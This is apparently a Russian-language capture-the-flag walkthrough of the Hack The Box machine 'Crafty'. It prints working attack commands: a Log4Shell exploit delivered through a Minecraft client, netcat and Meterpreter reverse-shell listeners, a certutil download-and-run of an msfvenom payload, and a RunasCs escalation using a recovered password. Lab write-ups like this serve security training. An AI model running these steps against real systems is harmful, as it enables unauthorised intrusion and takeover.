Видео-версия
Весь новый контент сначала выходит на канале t.me/kiberdruzhinnik. Подпишись, чтобы не пропускать его!
Обзор сервисов
Как думаете, стоит писать, с чего начинаем исследование?
$ rustscan --ulimit=5000 --range=1-65535 -a 10.129.225.128 -- -A -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/user/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.225.128:80
Open 10.129.225.128:25565
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.129.225.128
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-10 14:04 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Initiating Ping Scan at 14:04
Scanning 10.129.225.128 [2 ports]
Completed Ping Scan at 14:04, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:04
Completed Parallel DNS resolution of 1 host. at 14:04, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 14:04
Scanning 10.129.225.128 [2 ports]
Completed Connect Scan at 14:04, 2.45s elapsed (2 total ports)
Initiating Service scan at 14:04
NSE: Script scanning 10.129.225.128.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 5.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Nmap scan report for 10.129.225.128
Host is up, received syn-ack (0.15s latency).
Scanned at 2024-02-10 14:04:14 EST for 8s
PORT STATE SERVICE REASON VERSION
80/tcp filtered http no-response
25565/tcp filtered minecraft no-response
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:04
Completed NSE at 14:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds
Нужно сразу занести crafty.htb
в /etc/hosts
.
Домен play.crafty.htb
также занесем в /etc/hosts
, но он нам не понадобится.
Публичный эксплоит RCE
Воспользуемся эксплоитом:
$ git clone https://github.com/kozmer/log4j-shell-poc
$ cd log4j-shell-poc
# меняем /bin/sh на cmd.exe, у нас ведь Windows-машина
$ nano poc.py
$ wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
$ tar -zxf jdk-8u181-linux-x64.tar.gz
$ mv jdk1.8.0_181 jdk1.8.0_20
$ rlwrap nc -lnvp 4242
# в отдельном окне, нам покажут пейлоад
$ python3 poc.py --userip 10.10.14.86 --webport 4243 --lport 4242
# копируем пейлоад и открываем еще одно окно
$ git clone https://github.com/ammaraskar/pyCraft
$ cd pyCraft
$ python3 -m venv env
$ source env/bin/activate
$ pip install -r requirements.txt
$ python3 start.py
# пользователь
> 1
# пустой пароль
>
# сервер
> 10.129.225.128
# наш пейлоад
> ...
Флаг пользователя
Повышение привилегий
В папке server/plugins
обнаружим плагин к серверу.
C:\Users\svc_minecraft\server>cd plugins
C:\Users\svc_minecraft\server\plugins>dir
Volume in drive C has no label.
Volume Serial Number is C419-63F6
Directory of C:\Users\svc_minecraft\server\plugins
10/27/2023 01:48 PM <DIR> .
10/27/2023 01:48 PM <DIR> ..
10/27/2023 01:48 PM 9,996 playercounter-1.0-SNAPSHOT.jar
1 File(s) 9,996 bytes
2 Dir(s) 3,257,896,960 bytes free
Перейдем на Meterpreter.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4244 -f exe -o s.exe
$ msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4244
run
$ python3 -m http.server 4243
На удаленной машине.
certutil -urlcache -f http://10.10.14.86:4243/s.exe %temp%/s.exe
start %temp%/s.exe
Скачиваем файл playercounter-1.0-SNAPSHOT.jar
:
С помощью jd-gui
находим RCON пароль для управления сервером:
Сам RCON выключен в настройках сервера, но пароль подходит для админской учетной записи.
Загрузим на машину скомпилированный runascs.exe
и получим шелл.
Тут генерируем нагрузку и запускаем слушателя.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4246 -f exe -o s2.exe
$ msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4246
run
А тут исполняем нашу нагрузку с помощью пользователя Administrator
.
runascs.exe "Administrator" "xxx" "C:\\users\\svc_minecraft\\server\\logs\\s2.exe"